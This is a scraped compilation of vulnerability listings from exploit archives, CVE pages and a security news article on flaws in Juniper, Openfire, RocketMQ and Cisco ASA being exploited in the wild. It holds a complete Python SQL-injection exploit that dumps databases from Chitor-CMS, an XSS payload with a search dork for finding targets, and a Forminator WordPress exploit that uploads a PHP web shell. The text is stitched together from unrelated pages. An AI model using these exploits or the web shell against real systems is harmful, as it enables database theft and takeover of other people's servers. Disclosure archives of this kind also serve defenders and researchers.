Chitor-CMS before v1.1.2 was discovered to contain multiple SQL injection vulnerabilities.

**Chitor-CMS v1.1.2 - Pre-Auth SQL Injection**

**Platform:****PHP**

**Date:****2023-04-20**

  

    #!/usr/bin/python3
    
    #######################################################
    #                                                     # 
    #  Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection          #
    #  Date: 2023/04/13               #
    #  ExploitAuthor: msd0pe                                  #
    #  Project: https://github.com/waqaskanju/Chitor-CMS  #
    #  My Github: https://github.com/msd0pe-1             #
    #  Patched the 2023/04/16: 69d3442 commit             #
    #                                                     #
    #######################################################
    
    __description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'
    __author__ = 'msd0pe'
    __version__ = '1.1'
    __date__ = '2023/04/13'
    
    class bcolors:
        PURPLE = '\033[95m'
        BLUE = '\033[94m'
        GREEN = '\033[92m'
        OCRA = '\033[93m'
        RED = '\033[91m'
        CYAN = '\033[96m'
        ENDC = '\033[0m'
        BOLD = '\033[1m'
        UNDERLINE = '\033[4m'
    
    class infos:
        INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "
        ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "
        GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "
        PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "
    
    import re
    import requests
    import optparse
    from prettytable import PrettyTable
    
    def DumpTable(url, database, table):
        header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
        x = PrettyTable()
        columns = []
        payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"
        u = requests.get(url + payload, headers=header)
        try:
            r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
            r = r[0].replace('\"',"").split(',')
            if r == []:
                pass
            else:
                for i in r:
                    columns.append(i)
                    pass
        except:
            pass
        x.field_names = columns
        payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"
        u = requests.get(url + payload, headers=header)
        try:
            r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
            r = r[0].replace('\"',"").split(',')
            if r == []:
                pass
            else:
                for i in r:
                    i = i.split("xzmdpl")
                    x.add_rows([i])
        except ValueError:
            r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
            r = r[0].replace('\"',"").split(',')
            if r == []:
                pass
            else:
                for i in r:
                    i = i.split("xzmdpl")
                    i.append("")
                    x.add_rows([i])        
        print(x)
    
    def ListTables(url, database):
        header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
        x = PrettyTable()
        x.field_names = ["TABLES"]
        payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"
        u = requests.get(url + payload, headers=header)
        try:
            r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
            r = r[0].replace('\"',"").split(',')
            if r == []:
                pass
            else:
                for i in r:
                    x.add_row([i])
        except:
            pass
        print(x)
    
    def ListDatabases(url):
        header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
        x = PrettyTable()
        x.field_names = ["DATABASES"]
        payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"
        u = requests.get(url + payload, headers=header)
        try:
            r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
            r = r[0].replace('\"',"").split(',')
            if r == []:
                pass
            else:
                for i in r:
                    x.add_row([i])
        except:
            pass
        print(x)
    
    def Main():
        Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)
        Menu.add_option('-u', '--url', type="str", dest="url", help='target url')
        Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')
        Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')
        Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')
        Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')
        Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')
        (options, args) = Menu.parse_args()
    
        Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs
                                                             python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
                                                             python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
        """)
        Menu.add_option_group(Examples)
    
        if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:
            Menu.print_help()
            print('')
            print('  %s' % __description__)
            print('  Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)
            print('  Any malicious or illegal activity may be punishable by law')
            print('  Use at your own risk')
    
        elif len(args) == 0:
            try:
                if options.url != None:
                    if options.l_databases != None:
                        ListDatabases(options.url)
                    if options.database != None:
                        if options.l_tables != None:
                            ListTables(options.url, options.database)
                        if options.table != None:
                            if options.dump != None:
                                DumpTable(options.url, options.database, options.table)
            except:
                print("Unexpected error")
    
    if __name__ == '__main__':
        try:
            Main()
    
        except KeyboardInterrupt:
            print()
            print(infos.PROCESS + "Exiting...")
            print()
            exit(1)

CVE-2023-31714: OffSec’s Exploit Database Archive

IQ-Medya CMS version 2.0 suffers from a cross site scripting vulnerability.

**IQ-Medya CMS 2.0 Cross Site Scripting**

Posted Aug 30, 2023

Authored by indoushka

IQ-Medya CMS version 2.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | ab1e62fc2de79708c62ff8ba7205592a862ce474915df4ff25b9a691573bdc26

Download | Favorite | View

**IQ-Medya CMS 2.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : İQ-Medya CMS v2.0 XSS Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://iq-medya.net.tr                                                                                            |  | # Dork      : intext:''Tasarım iQ Digital''                                                                                      |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /tr/blog.php?page=<script>alert(/indoushka/);</script>[+]  http://127.0.0.1/uzmangayrimenkulcomtr/tr/blog.php?page=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,058)
*   Arbitrary (16,220)
*   BBS (2,859)
*   Bypass (1,741)
*   CGI (1,026)
*   Code Execution (7,285)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,462)
*   Encryption (2,370)
*   Exploit (52,004)
*   File Inclusion (4,225)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,788)
*   Intrusion Detection (892)
*   Java (3,046)
*   JavaScript (859)
*   Kernel (6,696)
*   Local (14,466)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,340)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,817)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,891)
*   Shell (3,188)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,394)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,798)
*   Web (9,671)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,974)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,822)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,555)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,781)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,852)
*   UNIX (9,302)
*   UnixWare (186)
*   Windows (6,579)
*   Other

IQ-Medya CMS 2.0 Cross Site Scripting

The User Access Manager WordPress plugin before 2.2.18 prioritizes getting a visitor's IP from certain HTTP headers over PHP's REMOTE_ADDR, which makes it possible for attackers to access restricted content in certain situations.

CVE-2022-1601

phpjabbers Business Directory Script 3.2 is vulnerable to SQL Injection via the column parameter.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-41539: CVE-nu11secur1ty/vendors/phpjabbers/2023/Business-Directory-Script-Version:3.2/SQLi at main · nu11secur1ty/CVE-nu11secur1ty

phpjabbers Business Directory Script 3.2 is vulnerable to Cross Site Scripting (XSS) via the keyword parameter.

CVE-2023-41537: CVE-nu11secur1ty/vendors/phpjabbers/2023/Business-Directory-Script-Version:3.2 at main · nu11secur1ty/CVE-nu11secur1ty

phpjabbers PHP Forum Script 3.0 is vulnerable to Cross Site Scripting (XSS) via the keyword parameter.

CVE-2023-41538: CVE-nu11secur1ty/vendors/phpjabbers/2023/PHP-Forum-Script-3.0 at main · nu11secur1ty/CVE-nu11secur1ty

Server-Side Request Forgery (SSRF) in GitHub repository bookstackapp/bookstack prior to v23.08.

@@ -0,0 +1,59 @@ <?php  
namespace Tests\\Unit;  
use BookStack\\Exceptions\\HttpFetchException; use BookStack\\Util\\SsrUrlValidator; use Tests\\TestCase;  
class SsrUrlValidatorTest extends TestCase { public function test\_allowed() { $testMap = \[ // Single values \['config' => '', 'url' => '', 'result' => false\], \['config' => '', 'url' => 'https://example.com', 'result' => false\], \['config' => ' ', 'url' => 'https://example.com', 'result' => false\], \['config' => '\*', 'url' => '', 'result' => false\], \['config' => '\*', 'url' => 'https://example.com', 'result' => true\], \['config' => 'https://\*', 'url' => 'https://example.com', 'result' => true\], \['config' => 'http://\*', 'url' => 'https://example.com', 'result' => false\], \['config' => 'https://\*example.com', 'url' => 'https://example.com', 'result' => true\], \['config' => 'https://\*ample.com', 'url' => 'https://example.com', 'result' => true\], \['config' => 'https://\*.example.com', 'url' => 'https://example.com', 'result' => false\], \['config' => 'https://\*.example.com', 'url' => 'https://test.example.com', 'result' => true\], \['config' => '\*//example.com', 'url' => 'https://example.com', 'result' => true\], \['config' => '\*//example.com', 'url' => 'http://example.com', 'result' => true\], \['config' => 'https://example.com', 'url' => 'https://example.com/a/b/c?test=cat', 'result' => true\], \['config' => 'https://example.com', 'url' => 'https://example.co.uk', 'result' => false\],  
// Escapes \['config' => 'https://(.\*?).com', 'url' => 'https://example.com', 'result' => false\], \['config' => 'https://example.com', 'url' => 'https://example.co.uk#https://example.com', 'result' => false\],  
// Multi values \['config' => '\*//example.org \*//example.com', 'url' => 'https://example.com', 'result' => true\], \['config' => '\*//example.org \*//example.com', 'url' => 'https://example.com/a/b/c?test=cat#hello', 'result' => true\], \['config' => '\*.example.org \*.example.com', 'url' => 'https://example.co.uk', 'result' => false\], \['config' => ' \*.example.org \*.example.com ', 'url' => 'https://example.co.uk', 'result' => false\], \['config' => '\* \*.example.com', 'url' => 'https://example.co.uk', 'result' => true\], \['config' => '\*//example.org \*//example.com \*//example.co.uk', 'url' => 'https://example.co.uk', 'result' => true\], \['config' => '\*//example.org \*//example.com \*//example.co.uk', 'url' => 'https://example.net', 'result' => false\], \];  
foreach ($testMap as $test) { $result = (new SsrUrlValidator($test\['config'\]))->allowed($test\['url'\]); $this\->assertEquals($test\['result'\], $result, "Failed asserting url '{$test\['url'\]}' with config '{$test\['config'\]}' results " . ($test\['result'\] ? 'true' : 'false')); } }  
public function test\_enssure\_allowed() { $result = (new SsrUrlValidator('https://example.com'))->ensureAllowed('https://example.com'); $this\->assertNull($result);  
$this\->expectException(HttpFetchException::class); (new SsrUrlValidator('https://example.com'))->ensureAllowed('https://test.example.com'); } }

CVE-2023-4624: Security: Added new SSR allow list and validator · BookStackApp/BookStack@c324ad9

The AffiliateWP for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'affwp_activate_addons_page_plugin' function called via an AJAX action in versions up to, and including, 2.14.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to activate arbitrary plugins.

CVE-2023-4600: Changelog - AffiliateWP

Recently disclosed security flaws impacting Juniper firewalls, Openfire, and Apache RocketMQ servers have come under active exploitation in the wild, according to multiple reports.
The Shadowserver Foundation said that it's "seeing exploitation attempts from multiple IPs for Juniper J-Web CVE-2023-36844 (& friends) targeting /webauth_operation.php endpoint," the same day a proof-of-concept (PoC)

Recently disclosed security flaws impacting Juniper firewalls, Openfire, and Apache RocketMQ servers have come under active exploitation in the wild, according to multiple reports.

The Shadowserver Foundation said that it's "seeing exploitation attempts from multiple IPs for Juniper J-Web CVE-2023-36844 (& friends) targeting /webauth\_operation.php endpoint," the same day a proof-of-concept (PoC) became available.

The issues, tracked as CVE-2023-36844, CVE-2023-36845, CVE-2023-36846, and CVE-2023-36847, reside in the J-Web component of Junos OS on Juniper SRX and EX Series. They could be chained by an unauthenticated, network-based attacker to execute arbitrary code on susceptible installations.

Patches for the flaw were released on August 17, 2023, a week after which watchTowr Labs published a proof-of-concept (PoC) by combining CVE-2023-36846 and CVE-2023-36845 to execute a PHP file containing malicious shellcode.

Currently, there are more than 8,200 Juniper devices that have their J-Web interfaces exposed to the internet, most of them from South Korea, the U.S., Hong Kong, Indonesia, Turkey, and India.

**Kinsing Exploits Openfire Vulnerability**

Another vulnerability that has been weaponized by threat actors is CVE-2023-32315, a high-severity path traversal bug in Openfire's administrative console that could be leveraged for remote code execution.

"This flaw allows an unauthorized user to exploit the unauthenticated Openfire Setup Environment within an established Openfire configuration," cloud security firm Aqua said.

"As a result, a threat actor gains access to the admin setup files that are typically restricted within the Openfire Admin Console. Next, the threat actor can choose between either adding an admin user to the console or uploading a plugin which will eventually allow full control over the server."

Threat actors associated with the Kinsing malware botnet have been observed utilizing the flaw to create a new admin user and upload a JAR file, which contains a file named cmd.jsp that acts as a web shell to drop and execute the malware and a cryptocurrency miner.

Aqua said it found 6,419 internet-connected servers with Openfire service running, with a majority of the instances located in China, the U.S., and Brazil.

**Apache RocketMQ Vulnerability Targeted by DreamBus Botnet**

In a sign that threat actors are always on the lookout for new flaws to exploit, an updated version of the DreamBus botnet malware has been observed taking advantage of a critical-severity remote code execution vulnerability in RocketMQ servers to compromise devices.

CVE-2023-33246, as the issue is cataloged as, is a remote code execution flaw impacting RocketMQ versions 5.1.0 and below that enables an unauthenticated attacker to run commands with the same access level as that of the system user process.

In the attacks detected by Juniper Threat Labs since June 19, 2023, successful exploitation of the flaw paves the way for the deployment of a bash script called "reketed," which acts as the downloader for the DreamBus botnet from a TOR hidden service.

DreamBus is a Linux-based malware that's a variant of SystemdMiner and is engineered to mine cryptocurrency on infected systems. Active since early 2019, it's been known to be propagated by specifically exploiting remote code execution vulnerabilities.

"As part of the installation routine, the malware terminates processes, and eliminates files associated with outdated versions of itself," security researcher Paul Kimayong said, adding it sets up persistence on the host by means of a cron job.

"However, the presence of a modular bot like the DreamBus malware equipped with the ability to execute bash scripts provides these cybercriminals the potential to diversify their attack repertoire, including the installation of various other forms of malware."

**Exploitation of Cisco ASA SSL VPNs to Deploy Akira Ransomware**

The developments come amid cybersecurity firm Rapid7 warning of an uptick in threat activity dating back to March 2023 and targeting Cisco ASA SSL VPN appliances in order to deploy Akira ransomware.

While some instances have entailed the use of credential stuffing, activity in others "appears to be the result of targeted brute-force attacks on ASA appliances where multi-factor authentication (MFA) was either not enabled or was not enforced for all users," the company said.

Cisco has acknowledged the attacks, noting that the threat actors could also be purchasing stolen credentials from the dark web to infiltrate organizations.

This hypothesis is further bolstered by the fact that an initial access broker referred to as Bassterlord was observed selling a guide on breaking into corporate networks in underground forums earlier this February.

"Notably, the author claimed they had compromised 4,865 Cisco SSL VPN services and 9,870 Fortinet VPN services with the username/password combination test:test," Rapid7 said.

"It's possible that, given the timing of the dark web discussion and the increased threat activity we observed, the manual's instruction contributed to the uptick in brute force attacks targeting Cisco ASA VPNs."

The disclosures also arrive as unpatched Citrix NetScaler ADC and Gateway appliances are at heightened risk of opportunistic attacks by ransomware actors who are making use of a critical flaw in the products to drop web shells and other payloads.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Alert: Juniper Firewalls, Openfire, and Apache RocketMQ Under Attack from New Exploits

The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

    # Exploit Title: WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution
    # Date: 2023-07-20
    # Exploit Author: Mehmet Kelepçe
    # Vendor Homepage: https://wpmudev.com/project/forminator-pro/
    # Software Link: https://wordpress.org/plugins/forminator/
    # Version: 1.24.6
    # Tested on: PHP - Mysql - Apache2 - Windows 11
    
    HTTP Request and vulnerable parameter:
    -------------------------------------------------------------------------
    POST /3/wordpress/wp-admin/admin-ajax.php HTTP/1.1
    Host: localhost
    Content-Length: 1756
    sec-ch-ua:
    Accept: */*
    Content-Type: multipart/form-data;
    boundary=----WebKitFormBoundaryTmsFfkbegmAjomne
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
    AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199
    Safari/537.36
    sec-ch-ua-platform: ""
    Origin: http://localhost
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost/3/wordpress/2023/01/01/merhaba-dunya/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: wp-settings-time-1=1689794282;
    wordpress_test_cookie=WP%20Cookie%20check; wp_lang=tr_TR
    Connection: close
    
    .
    .
    .
    .
    .
    
    ------WebKitFormBoundaryTmsFfkbegmAjomne
    Content-Disposition: form-data; name="postdata-1-post-image";
    filename="mehmet.php"
    Content-Type: application/octet-stream
    
    <?php
    $_GET['function']($_GET['cmd']);
    ?>
    
    
    
    Source Code:
    wp-content/plugins/forminator/library/modules/custom-forms/front/front-render.php:
    --------------------------------------------------------------------
            public function has_upload() {
    $fields = $this->get_fields();
    
    if ( ! empty( $fields ) ) {
    foreach ( $fields as $field ) {
    if ( 'upload' === $field['type'] || 'postdata' === $field['type'] ) {
    return true;
    }
    }
    }
    
    return false;
    }
    Vulnerable parameter: postdata-1-post-image
    
    and
    
    
    Source code:
    wp-content/plugins/forminator/library/fields/postdata.php:
    -------------------------------------------------------------------
    if ( ! empty( $post_image ) && isset( $_FILES[ $image_field_name ] ) ) {
    if ( isset( $_FILES[ $image_field_name ]['name'] ) && ! empty(
    $_FILES[ $image_field_name ]['name'] ) ) {
    $file_name = sanitize_file_name( $_FILES[ $image_field_name ]['name'] );
    $valid     = wp_check_filetype( $file_name );
    
    if ( false === $valid['ext'] || ! in_array( $valid['ext'],
    $this->image_extensions ) ) {
    $this->validation_message[ $image_field_name ] = apply_filters(
    'forminator_postdata_field_post_image_nr_validation_message',
    esc_html__( 'Uploaded file\'s extension is not allowed.', 'forminator' ),
    $id
    );
    }
    }
    }
    
    Vulnerable function: $image_field_name
    -------------------------------------------------------------------------
    
    Payload file: mehmet.php
    <?php
    $_GET['function']($_GET['cmd']);
    ?>
    -------------------------------------------------------------------------

Tag

#php